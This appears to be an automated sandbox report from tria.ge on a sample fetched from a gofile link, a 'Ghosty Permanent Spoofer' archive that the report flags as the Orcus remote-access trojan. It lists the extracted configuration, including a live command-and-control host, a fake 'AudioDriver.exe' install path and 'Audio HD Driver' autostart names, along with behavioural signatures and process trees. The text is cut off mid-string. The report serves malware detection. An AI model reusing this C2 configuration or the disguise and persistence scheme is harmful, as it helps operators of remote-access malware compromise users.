Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
430s -
max time network
433s -
platform
windows11-21h2_x64 -
resource
win11-20250207-en -
resource tags
arch:x64arch:x86image:win11-20250207-enlocale:en-usos:windows11-21h2-x64system -
submitted
09/02/2025, 17:59
Static task
static1
URLScan task
urlscan1
Behavioral task
behavioral1
Sample
https://gofile.io/d/dg0UQ7
Resource
win10ltsc2021-20250128-en
General
Malware Config
Extracted
orcus
another-contains.gl.at.ply.gg
a49af69032c94d6fa7c0d2639d32f038
-
administration_rights_required
false
-
anti_debugger
false
-
anti_tcp_analyzer
false
-
antivm
false
-
autostart_method
1
-
change_creation_date
false
-
force_installer_administrator_privileges
false
-
hide_file
false
-
install
false
-
installation_folder
%appdata%\Microsoft\Speech\AudioDriver.exe
-
installservice
false
-
keylogger_enabled
false
-
newcreationdate
12/24/2024 02:03:43
-
plugins
AgUFyOzBvwKV1wLetwKoxrcNilV/bBUKRwBhAG0AZQByACAAVgBpAGUAdwAHAzEALgAyAEEgYgA2ADkAZgA0ADUAZQBiADYANgAxADYANAA2ADAAZgA5AGUAMQAwADIAMgBkADcANwA3ADMAMABmADAANwAzAAIAAAACAg==
-
reconnect_delay
10000
-
registry_autostart_keyname
Audio HD Driver
-
registry_hidden_autostart
false
-
set_admin_flag
false
-
tasksch_name
Audio HD Driver
-
tasksch_request_highest_privileges
false
-
try_other_autostart_onfail
false
Signatures
-
Orcus family
-
Executes dropped EXE 7 IoCs
pid Process 2896 GHOSTYFN.exe 5524 GHOSTYFN.exe 1104 spoof.exe 4904 AudioDriver.exe 3860 GHOSTYFN.exe 6108 GHOSTYFN.exe 1256 spoof.exe -
Loads dropped DLL 15 IoCs
pid Process 5524 GHOSTYFN.exe 5524 GHOSTYFN.exe 5524 GHOSTYFN.exe 5524 GHOSTYFN.exe 5524 GHOSTYFN.exe 5524 GHOSTYFN.exe 5524 GHOSTYFN.exe 4904 AudioDriver.exe 6108 GHOSTYFN.exe 6108 GHOSTYFN.exe 6108 GHOSTYFN.exe 6108 GHOSTYFN.exe 6108 GHOSTYFN.exe 6108 GHOSTYFN.exe 6108 GHOSTYFN.exe -
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 11 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MicrosoftEdgeUpdate.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language spoof.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MicrosoftEdgeUpdate.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wermgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MicrosoftEdgeUpdate.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language GHOSTYFN.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language AudioDriver.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language GHOSTYFN.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language spoof.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 3 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 2012 MicrosoftEdgeUpdate.exe 4676 MicrosoftEdgeUpdate.exe 1956 MicrosoftEdgeUpdate.exe -
Checks SCSI registry key(s) 3 TTPs 6 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName taskmgr.exe -
Checks processor information in registry 2 TTPs 17 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 wermgr.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString wermgr.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier wermgr.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString taskmgr.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz wermgr.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier wermgr.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 wermgr.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision wermgr.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 taskmgr.exe -
Enumerates system info in registry 2 TTPs 2 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS wermgr.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU wermgr.exe -
Modifies registry class 3 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1387034853-841019411-4036473919-1000_Classes\Local Settings firefox.exe Key created \REGISTRY\USER\S-1-5-21-1387034853-841019411-4036473919-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.WindowsTerminal_8wekyb3d8bbwe\StartTerminalOnLoginTask taskmgr.exe Key created \REGISTRY\USER\S-1-5-21-1387034853-841019411-4036473919-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.WindowsTerminal_8wekyb3d8bbwe\StartTerminalOnLoginTask taskmgr.exe -
NTFS ADS 1 IoCs
description ioc Process File created C:\Users\Admin\Downloads\Ghosty Permanent Spoofer.rar:Zone.Identifier firefox.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4724 powershell.exe 4724 powershell.exe 4724 powershell.exe 4904 AudioDriver.exe 4904 AudioDriver.exe 4904 AudioDriver.exe 4904 AudioDriver.exe 4904 AudioDriver.exe 4904 AudioDriver.exe 4904 AudioDriver.exe 4904 AudioDriver.exe 4904 AudioDriver.exe 4904 AudioDriver.exe 4904 AudioDriver.exe 4904 AudioDriver.exe 4904 AudioDriver.exe 4904 AudioDriver.exe 4904 AudioDriver.exe 4904 AudioDriver.exe 2028 powershell.exe 2028 powershell.exe 4904 AudioDriver.exe 4904 AudioDriver.exe 4904 AudioDriver.exe 2028 powershell.exe 4904 AudioDriver.exe 4904 AudioDriver.exe 4904 AudioDriver.exe 4904 AudioDriver.exe 4904 AudioDriver.exe 4904 AudioDriver.exe 4904 AudioDriver.exe 4904 AudioDriver.exe 4904 AudioDriver.exe 4904 AudioDriver.exe 4904 AudioDriver.exe 4904 AudioDriver.exe 4904 AudioDriver.exe 4904 AudioDriver.exe 4904 AudioDriver.exe 4904 AudioDriver.exe 4904 AudioDriver.exe 4904 AudioDriver.exe 4904 AudioDriver.exe 4904 AudioDriver.exe 4904 AudioDriver.exe 4904 AudioDriver.exe 4904 AudioDriver.exe 4904 AudioDriver.exe 4904 AudioDriver.exe 4904 AudioDriver.exe 4904 AudioDriver.exe 4904 AudioDriver.exe 4904 AudioDriver.exe 4904 AudioDriver.exe 8 taskmgr.exe 8 taskmgr.exe 8 taskmgr.exe 8 taskmgr.exe 8 taskmgr.exe 8 taskmgr.exe 4904 AudioDriver.exe 4904 AudioDriver.exe 4904 AudioDriver.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 1612 taskmgr.exe -
Suspicious use of AdjustPrivilegeToken 30 IoCs
description pid Process Token: SeDebugPrivilege 2936 firefox.exe Token: SeDebugPrivilege 2936 firefox.exe Token: SeDebugPrivilege 2936 firefox.exe Token: SeDebugPrivilege 2936 firefox.exe Token: SeDebugPrivilege 2936 firefox.exe Token: SeDebugPrivilege 2936 firefox.exe Token: SeRestorePrivilege 3960 7zG.exe Token: 35 3960 7zG.exe Token: SeSecurityPrivilege 3960 7zG.exe Token: SeSecurityPrivilege 3960 7zG.exe Token: SeDebugPrivilege 4724 powershell.exe Token: SeDebugPrivilege 4904 AudioDriver.exe Token: SeDebugPrivilege 2028 powershell.exe Token: SeDebugPrivilege 2936 firefox.exe Token: SeDebugPrivilege 8 taskmgr.exe Token: SeSystemProfilePrivilege 8 taskmgr.exe Token: SeCreateGlobalPrivilege 8 taskmgr.exe Token: 33 8 taskmgr.exe Token: SeIncBasePriorityPrivilege 8 taskmgr.exe Token: SeBackupPrivilege 2400 svchost.exe Token: SeRestorePrivilege 2400 svchost.exe Token: SeSecurityPrivilege 2400 svchost.exe Token: SeTakeOwnershipPrivilege 2400 svchost.exe Token: 35 2400 svchost.exe Token: SeDebugPrivilege 1612 taskmgr.exe Token: SeSystemProfilePrivilege 1612 taskmgr.exe Token: SeCreateGlobalPrivilege 1612 taskmgr.exe Token: SeDebugPrivilege 2936 firefox.exe Token: 33 1612 taskmgr.exe Token: SeIncBasePriorityPrivilege 1612 taskmgr.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 2936 firefox.exe 2936 firefox.exe 2936 firefox.exe 2936 firefox.exe 2936 firefox.exe 2936 firefox.exe 2936 firefox.exe 2936 firefox.exe 2936 firefox.exe 2936 firefox.exe 2936 firefox.exe 2936 firefox.exe 2936 firefox.exe 2936 firefox.exe 2936 firefox.exe 2936 firefox.exe 2936 firefox.exe 2936 firefox.exe 2936 firefox.exe 2936 firefox.exe 2936 firefox.exe 3960 7zG.exe 8 taskmgr.exe 8 taskmgr.exe 8 taskmgr.exe 8 taskmgr.exe 8 taskmgr.exe 8 taskmgr.exe 8 taskmgr.exe 8 taskmgr.exe 8 taskmgr.exe 8 taskmgr.exe 8 taskmgr.exe 8 taskmgr.exe 8 taskmgr.exe 8 taskmgr.exe 8 taskmgr.exe 8 taskmgr.exe 8 taskmgr.exe 8 taskmgr.exe 8 taskmgr.exe 8 taskmgr.exe 8 taskmgr.exe 8 taskmgr.exe 8 taskmgr.exe 8 taskmgr.exe 8 taskmgr.exe 8 taskmgr.exe 8 taskmgr.exe 8 taskmgr.exe 8 taskmgr.exe 8 taskmgr.exe 8 taskmgr.exe 8 taskmgr.exe 8 taskmgr.exe 8 taskmgr.exe 8 taskmgr.exe 8 taskmgr.exe 1612 taskmgr.exe 1612 taskmgr.exe 1612 taskmgr.exe 1612 taskmgr.exe 1612 taskmgr.exe 1612 taskmgr.exe -
Suspicious use of SendNotifyMessage 64 IoCs
pid Process 8 taskmgr.exe 8 taskmgr.exe 8 taskmgr.exe 8 taskmgr.exe 8 taskmgr.exe 8 taskmgr.exe 8 taskmgr.exe 8 taskmgr.exe 8 taskmgr.exe 8 taskmgr.exe 8 taskmgr.exe 8 taskmgr.exe 8 taskmgr.exe 8 taskmgr.exe 8 taskmgr.exe 8 taskmgr.exe 8 taskmgr.exe 8 taskmgr.exe 8 taskmgr.exe 8 taskmgr.exe 8 taskmgr.exe 8 taskmgr.exe 8 taskmgr.exe 8 taskmgr.exe 8 taskmgr.exe 8 taskmgr.exe 8 taskmgr.exe 8 taskmgr.exe 8 taskmgr.exe 8 taskmgr.exe 8 taskmgr.exe 8 taskmgr.exe 8 taskmgr.exe 8 taskmgr.exe 8 taskmgr.exe 8 taskmgr.exe 1612 taskmgr.exe 1612 taskmgr.exe 1612 taskmgr.exe 1612 taskmgr.exe 1612 taskmgr.exe 1612 taskmgr.exe 1612 taskmgr.exe 1612 taskmgr.exe 1612 taskmgr.exe 1612 taskmgr.exe 1612 taskmgr.exe 1612 taskmgr.exe 1612 taskmgr.exe 1612 taskmgr.exe 1612 taskmgr.exe 1612 taskmgr.exe 1612 taskmgr.exe 1612 taskmgr.exe 1612 taskmgr.exe 1612 taskmgr.exe 1612 taskmgr.exe 1612 taskmgr.exe 1612 taskmgr.exe 1612 taskmgr.exe 1612 taskmgr.exe 1612 taskmgr.exe 1612 taskmgr.exe 1612 taskmgr.exe -
Suspicious use of SetWindowsHookEx 9 IoCs
pid Process 2936 firefox.exe 2936 firefox.exe 2936 firefox.exe 2936 firefox.exe 2936 firefox.exe 2936 firefox.exe 2936 firefox.exe 2896 GHOSTYFN.exe 3860 GHOSTYFN.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1992 wrote to memory of 2936 1992 firefox.exe 90 PID 1992 wrote to memory of 2936 1992 firefox.exe 90 PID 1992 wrote to memory of 2936 1992 firefox.exe 90 PID 1992 wrote to memory of 2936 1992 firefox.exe 90 PID 1992 wrote to memory of 2936 1992 firefox.exe 90 PID 1992 wrote to memory of 2936 1992 firefox.exe 90 PID 1992 wrote to memory of 2936 1992 firefox.exe 90 PID 1992 wrote to memory of 2936 1992 firefox.exe 90 PID 1992 wrote to memory of 2936 1992 firefox.exe 90 PID 1992 wrote to memory of 2936 1992 firefox.exe 90 PID 1992 wrote to memory of 2936 1992 firefox.exe 90 PID 2936 wrote to memory of 3260 2936 firefox.exe 91 PID 2936 wrote to memory of 3260 2936 firefox.exe 91 PID 2936 wrote to memory of 3260 2936 firefox.exe 91 PID 2936 wrote to memory of 3260 2936 firefox.exe 91 PID 2936 wrote to memory of 3260 2936 firefox.exe 91 PID 2936 wrote to memory of 3260 2936 firefox.exe 91 PID 2936 wrote to memory of 3260 2936 firefox.exe 91 PID 2936 wrote to memory of 3260 2936 firefox.exe 91 PID 2936 wrote to memory of 3260 2936 firefox.exe 91 PID 2936 wrote to memory of 3260 2936 firefox.exe 91 PID 2936 wrote to memory of 3260 2936 firefox.exe 91 PID 2936 wrote to memory of 3260 2936 firefox.exe 91 PID 2936 wrote to memory of 3260 2936 firefox.exe 91 PID 2936 wrote to memory of 3260 2936 firefox.exe 91 PID 2936 wrote to memory of 3260 2936 firefox.exe 91 PID 2936 wrote to memory of 3260 2936 firefox.exe 91 PID 2936 wrote to memory of 3260 2936 firefox.exe 91 PID 2936 wrote to memory of 3260 2936 firefox.exe 91 PID 2936 wrote to memory of 3260 2936 firefox.exe 91 PID 2936 wrote to memory of 3260 2936 firefox.exe 91 PID 2936 wrote to memory of 3260 2936 firefox.exe 91 PID 2936 wrote to memory of 3260 2936 firefox.exe 91 PID 2936 wrote to memory of 3260 2936 firefox.exe 91 PID 2936 wrote to memory of 3260 2936 firefox.exe 91 PID 2936 wrote to memory of 3260 2936 firefox.exe 91 PID 2936 wrote to memory of 3260 2936 firefox.exe 91 PID 2936 wrote to memory of 3260 2936 firefox.exe 91 PID 2936 wrote to memory of 3260 2936 firefox.exe 91 PID 2936 wrote to memory of 3260 2936 firefox.exe 91 PID 2936 wrote to memory of 3260 2936 firefox.exe 91 PID 2936 wrote to memory of 3260 2936 firefox.exe 91 PID 2936 wrote to memory of 3260 2936 firefox.exe 91 PID 2936 wrote to memory of 3260 2936 firefox.exe 91 PID 2936 wrote to memory of 3260 2936 firefox.exe 91 PID 2936 wrote to memory of 3260 2936 firefox.exe 91 PID 2936 wrote to memory of 3260 2936 firefox.exe 91 PID 2936 wrote to memory of 3260 2936 firefox.exe 91 PID 2936 wrote to memory of 3260 2936 firefox.exe 91 PID 2936 wrote to memory of 3260 2936 firefox.exe 91 PID 2936 wrote to memory of 3260 2936 firefox.exe 91 PID 2936 wrote to memory of 3260 2936 firefox.exe 91 PID 2936 wrote to memory of 3260 2936 firefox.exe 91 PID 2936 wrote to memory of 3260 2936 firefox.exe 91 PID 2936 wrote to memory of 3260 2936 firefox.exe 91 PID 2936 wrote to memory of 3260 2936 firefox.exe 91 PID 2936 wrote to memory of 324 2936 firefox.exe 92 PID 2936 wrote to memory of 324 2936 firefox.exe 92 PID 2936 wrote to memory of 324 2936 firefox.exe 92 PID 2936 wrote to memory of 324 2936 firefox.exe 92 PID 2936 wrote to memory of 324 2936 firefox.exe 92 PID 2936 wrote to memory of 324 2936 firefox.exe 92 PID 2936 wrote to memory of 324 2936 firefox.exe 92 PID 2936 wrote to memory of 324 2936 firefox.exe 92 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url "https://gofile.io/d/dg0UQ7"1⤵
- Suspicious use of WriteProcessMemory
PID:1992 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url https://gofile.io/d/dg0UQ72⤵
- Checks processor information in registry
- Modifies registry class
- NTFS ADS
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2936 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1964 -parentBuildID 20240401114208 -prefsHandle 1892 -prefMapHandle 1884 -prefsLen 27429 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {f0da864e-42d9-4224-bf9e-59da19ba50fe} 2936 "\\.\pipe\gecko-crash-server-pipe.2936" gpu3⤵PID:3260
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2364 -parentBuildID 20240401114208 -prefsHandle 2356 -prefMapHandle 2352 -prefsLen 28349 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c599c28f-3bf0-40e8-83b1-143a9f4755b7} 2936 "\\.\pipe\gecko-crash-server-pipe.2936" socket3⤵PID:324
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3228 -childID 1 -isForBrowser -prefsHandle 3220 -prefMapHandle 3216 -prefsLen 22746 -prefMapSize 244658 -jsInitHandle 1236 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {21b256c7-feea-4aee-a426-0e215f7aa00a} 2936 "\\.\pipe\gecko-crash-server-pipe.2936" tab3⤵PID:2092
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3656 -childID 2 -isForBrowser -prefsHandle 3608 -prefMapHandle 3632 -prefsLen 32839 -prefMapSize 244658 -jsInitHandle 1236 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {20a9eeae-b411-4d02-802b-14933f13d112} 2936 "\\.\pipe\gecko-crash-server-pipe.2936" tab3⤵PID:2384
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4576 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4568 -prefMapHandle 4564 -prefsLen 32839 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {362f46ce-f206-4424-84fb-4d9d13bcfbda} 2936 "\\.\pipe\gecko-crash-server-pipe.2936" utility3⤵
- Checks processor information in registry
PID:5384
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5288 -childID 3 -isForBrowser -prefsHandle 5284 -prefMapHandle 5280 -prefsLen 27145 -prefMapSize 244658 -jsInitHandle 1236 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ff1b7953-a996-4143-bd60-3e91bd053b2d} 2936 "\\.\pipe\gecko-crash-server-pipe.2936" tab3⤵PID:5908
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5424 -childID 4 -isForBrowser -prefsHandle 5432 -prefMapHandle 5436 -prefsLen 27145 -prefMapSize 244658 -jsInitHandle 1236 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {764df39f-0ab4-4cc3-8650-6e5764a1beaf} 2936 "\\.\pipe\gecko-crash-server-pipe.2936" tab3⤵PID:5920
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5696 -childID 5 -isForBrowser -prefsHandle 5616 -prefMapHandle 5620 -prefsLen 27145 -prefMapSize 244658 -jsInitHandle 1236 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5be6a179-36f8-45ab-8e0c-0045347d91b9} 2936 "\\.\pipe\gecko-crash-server-pipe.2936" tab3⤵PID:5932
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3588 -childID 6 -isForBrowser -prefsHandle 6048 -prefMapHandle 6056 -prefsLen 30775 -prefMapSize 244658 -jsInitHandle 1236 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ff6b4771-597e-4506-96a0-a3fec45edb9b} 2936 "\\.\pipe\gecko-crash-server-pipe.2936" tab3⤵PID:5756
-
-
-
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4xOTUuNDMiIHNoZWxsX3ZlcnNpb249IjEuMy4xOTUuNDMiIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7RDE5Nzg3NTEtNkVERi00OTM4LThENDktNzI1NTRDQzZEODNCfSIgdXNlcmlkPSJ7Qzg3OUI1RTUtMEQ0MC00RDY4LTg4ODktNjc2RkU4MDEzQTg0fSIgaW5zdGFsbHNvdXJjZT0ibGltaXRlZCIgcmVxdWVzdGlkPSJ7RTYxNEM4OUMtOEZGNC00NjQ3LUE3NzctNDNEREM3RUYwMjVEfSIgZGVkdXA9ImNyIiBkb21haW5qb2luZWQ9IjAiPjxodyBsb2dpY2FsX2NwdXM9IjIiIHBoeXNtZW1vcnk9IjQiIGRpc2tfdHlwZT0iMiIgc3NlPSIxIiBzc2UyPSIxIiBzc2UzPSIxIiBzc3NlMz0iMSIgc3NlNDE9IjEiIHNzZTQyPSIxIiBhdng9IjEiLz48b3MgcGxhdGZvcm09IndpbiIgdmVyc2lvbj0iMTAuMC4yMjAwMC40OTMiIHNwPSIiIGFyY2g9Ing2NCIgcHJvZHVjdF90eXBlPSI0OCIgaXNfd2lwPSIwIiBpc19pbl9sb2NrZG93bl9tb2RlPSIwIi8-PG9lbSBwcm9kdWN0X21hbnVmYWN0dXJlcj0iIiBwcm9kdWN0X25hbWU9IiIvPjxleHAgZXRhZz0iJnF1b3Q7RSt4YkF6Nlk2c1UxMjg5YlM2cWw0VlJMYmtqZkJVR1RNSnNqckhyNDRpST0mcXVvdDsiLz48YXBwIGFwcGlkPSJ7OEE2OUQzNDUtRDU2NC00NjNjLUFGRjEtQTY5RDlFNTMwRjk2fSIgdmVyc2lvbj0iMTIzLjAuNjMxMi4xMjMiIG5leHR2ZXJzaW9uPSIiIGxhbmc9ImVuIiBicmFuZD0iR0dMUyIgY2xpZW50PSIiIGluc3RhbGxhZ2U9IjEiIGluc3RhbGxkYXRldGltZT0iMTczODk1NjY0MSIgb29iZV9pbnN0YWxsX3RpbWU9IjEzMzgzNDI5MjY4NjIxMDAwMCI-PGV2ZW50IGV2ZW50dHlwZT0iMzEiIGV2ZW50cmVzdWx0PSIxIiBlcnJvcmNvZGU9IjAiIGV4dHJhY29kZTE9IjIxNzk4NjIiIHN5c3RlbV91cHRpbWVfdGlja3M9IjUxMzg3MzcwMDMiLz48L2FwcD48L3JlcXVlc3Q-1⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
PID:2012
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --string-annotations --always-read-main-dll --field-trial-handle=5320,i,10197502093716787037,1657341123329582809,262144 --variations-seed-version --mojo-platform-channel-handle=3784 /prefetch:141⤵PID:5168
-
C:\Windows\SysWOW64\wermgr.exe"C:\Windows\system32\wermgr.exe" "-outproc" "0" "2612" "1264" "1164" "1272" "0" "0" "0" "0" "0" "0" "0" "0"1⤵
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Enumerates system info in registry
PID:1612
-
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4xOTUuNDMiIHNoZWxsX3ZlcnNpb249IjEuMy4xOTUuNDMiIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7RDE5Nzg3NTEtNkVERi00OTM4LThENDktNzI1NTRDQzZEODNCfSIgdXNlcmlkPSJ7Qzg3OUI1RTUtMEQ0MC00RDY4LTg4ODktNjc2RkU4MDEzQTg0fSIgaW5zdGFsbHNvdXJjZT0ic2NoZWR1bGVyIiByZXF1ZXN0aWQ9Ins0NDUyRjcyMi0zQkU2LTQ1RjItQTA2OS02QjMwOEU2NkYwQUN9IiBkZWR1cD0iY3IiIGRvbWFpbmpvaW5lZD0iMCI-PGh3IGxvZ2ljYWxfY3B1cz0iMiIgcGh5c21lbW9yeT0iNCIgZGlza190eXBlPSIyIiBzc2U9IjEiIHNzZTI9IjEiIHNzZTM9IjEiIHNzc2UzPSIxIiBzc2U0MT0iMSIgc3NlNDI9IjEiIGF2eD0iMSIvPjxvcyBwbGF0Zm9ybT0id2luIiB2ZXJzaW9uPSIxMC4wLjIyMDAwLjQ5MyIgc3A9IiIgYXJjaD0ieDY0IiBwcm9kdWN0X3R5cGU9IjQ4IiBpc193aXA9IjAiIGlzX2luX2xvY2tkb3duX21vZGU9IjAiLz48b2VtIHByb2R1Y3RfbWFudWZhY3R1cmVyPSIiIHByb2R1Y3RfbmFtZT0iIi8-PGV4cCBldGFnPSImcXVvdDtWUFFvUDFGK2ZxMTV3UnpoMWtQTDRQTXBXaDhPUk1CNWl6dnJPQy9jaGpRPSZxdW90OyIvPjxhcHAgYXBwaWQ9Ins1NkVCMThGOC1CMDA4LTRDQkQtQjZEMi04Qzk3RkU3RTkwNjJ9IiB2ZXJzaW9uPSIxMzIuMC4yOTU3LjE0MCIgbmV4dHZlcnNpb249IiIgbGFuZz0iIiBicmFuZD0iSU5CWCIgY2xpZW50PSIiIGluc3RhbGxhZ2U9IjEiIGluc3RhbGxkYXRldGltZT0iMTczODk1Nj